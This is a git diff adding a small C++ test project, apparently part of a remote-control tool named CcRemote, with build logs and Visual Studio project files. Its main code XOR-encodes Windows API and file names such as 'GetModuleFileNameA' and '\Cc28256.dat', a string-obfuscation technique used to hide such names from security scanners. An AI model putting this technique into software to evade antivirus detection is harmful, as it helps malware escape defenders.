+f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\link.write.1.tlog
diff --git a/strCodeTest/strCodeTest/Debug/strCodeTest.log b/strCodeTest/strCodeTest/Debug/strCodeTest.log
new file mode 100644
index 0000000..a2fd81c
--- /dev/null
+++ b/strCodeTest/strCodeTest/Debug/strCodeTest.log
@@ -0,0 +1,6 @@
+ strCodeTest.cpp
+f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(13): warning C4018: “<=”: 有符号/无符号不匹配
+f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(15): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据
+f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(27): warning C4018: “<=”: 有符号/无符号不匹配
+f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(29): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据
+ strCodeTest.vcxproj -> F:\myapp\CcRemote\strCodeTest\Debug\strCodeTest.exe
diff --git a/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate b/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate
new file mode 100644
index 0000000..5bbebeb
--- /dev/null
+++ b/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0
+Debug|Win32|F:\myapp\CcRemote\strCodeTest\|
diff --git a/strCodeTest/strCodeTest/strCodeTest.cpp b/strCodeTest/strCodeTest/strCodeTest.cpp
new file mode 100644
index 0000000..344f54f
--- /dev/null
+++ b/strCodeTest/strCodeTest/strCodeTest.cpp
@@ -0,0 +1,54 @@
+// stringCryDemo.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
+//
+
+#include
+
+char* crycode(char* str)
+{
+ printf("cry: %s \n", str);
+ int len = strlen(str);
+ char * a = (char *)operator new(len + 1);
+ a[0] = len;
+ printf("0x%02hhx,", a[0]);
+ for (size_t i = 1; i <= len; i++)
+ {
+ a[i] = str[i - 1] ^ (0xCC - i);
+ printf("0x%02hhx,", a[i]);
+ }
+ printf("\n");
+ return a;
+}
+
+
+char* uncode(char* str)
+{
+ int len = str[0];
+ char * uncodeStr = (char *)operator new(len + 1);
+ for (size_t i = 1; i <= len; i++)
+ {
+ uncodeStr[i - 1] = str[i] ^ (0xCC - i);
+ printf("%c", uncodeStr[i - 1]);
+ }
+ uncodeStr[len] = 0x00;
+ printf("\n");
+ return uncodeStr;
+}
+
+
+
+
+int main()
+{
+ char a[] = "kernel32";
+ char b[] = "GetModuleFileNameA";
+ char c[] = "\\Cc28256.dat";
+ char d[] = "REG_MULTI_SZ";
+ char* s1 = crycode(a);
+ char* s2 = crycode(b);
+ char* s3 = crycode(c);
+ char* s4 = crycode(d);
+ uncode(s1);
+ uncode(s2);
+ uncode(s3);
+ uncode(s4);
+}
\ No newline at end of file
diff --git a/strCodeTest/strCodeTest/strCodeTest.vcxproj b/strCodeTest/strCodeTest/strCodeTest.vcxproj
new file mode 100644
index 0000000..f502898
--- /dev/null
+++ b/strCodeTest/strCodeTest/strCodeTest.vcxproj
@@ -0,0 +1,159 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 15.0
+ {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}
+ Win32Proj
+ strCodeTest
+ 10.0.17763.0
+
+
+
+ Application
+ true
+ v141
+ Unicode
+
+
+ Application
+ false
+ v141
+ true
+ Unicode
+
+
+ Application
+ true
+ v141
+ Unicode
+
+
+ Application
+ false
+ v141
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+
+
+ Level3
+ Disabled
+ true
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+
+
+ Level3
+ Disabled
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+
+
+ Level3
+ MaxSpeed
+ true
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+ Level3
+ MaxSpeed
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/strCodeTest/strCodeTest/strCodeTest.vcxproj.filters b/strCodeTest/strCodeTest/strCodeTest.vcxproj.filters
new file mode 100644
index 0000000..ccf0b43
--- /dev/null
+++ b/strCodeTest/strCodeTest/strCodeTest.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git a/strCodeTest/strCodeTest/strCodeTest.vcxproj.user b/strCodeTest/strCodeTest/strCodeTest.vcxproj.user
new file mode 100644
index 0000000..be25078
--- /dev/null
+++ b/strCodeTest/strCodeTest/strCodeTest.vcxproj.user
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file